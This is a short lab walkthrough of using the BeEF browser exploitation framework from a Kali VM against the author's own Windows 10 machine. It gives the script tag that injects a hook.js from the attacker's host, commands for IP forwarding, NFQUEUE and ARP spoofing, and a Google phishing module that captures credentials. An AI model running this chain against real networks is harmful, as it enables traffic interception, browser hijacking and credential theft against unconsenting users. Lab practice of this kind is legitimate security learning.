My environment contains KaliLinux VM(Hacker) and Windows 10(Target).
If you are also using Kali Linux beef should be already installed.
After beef started you will see the terminal and after few seconds browser will appear.
Login in a browser using username beef and password beef.
If you check in the terminal there is filed Example. This is the example of how beef can be used. I should copy this line, change 127.0.0.1 with my IP address. In my case, this is 10.0.2.15. And replace injection_code in code_injector script with new content.
injection_code = '<script src="http://10.0.2.15:3000/hook.js"></script>'
Enable port forwarding, iptables queue, and arp_spoofin and code_injector.
echo 1 > /proc/sys/net/ipv4/ip_forward iptables -I FORWARD -j NFQUEUE --queue-num 0 python arp_spoofing.py -t 10.0.2.4 -g 10.0.2.1 # Start code injector in new window python code_injector.py
And wait when target opens some page in the browser. Because in this case, I am the target I can open browser by myself.
Let’s back to beef and you will see, beef hooked target browser. Here I can check browser information, logs, execute a command and do other interesting stuff.
As for example let’s try google phishing.
Open Social Engineering, choose Google Phishing and press execute. And this page will be automatically opened on target browser.
After a target, enter credentials browser will do redirect to 0.0.0.0:3000 it is because in Google Phishing I left XSS hook URL as 0.0.0.0:3000. But if you check beef again you will see
Beef has many other commands, like take a screenshot, turn on webcam and etc.
Learn more about beef.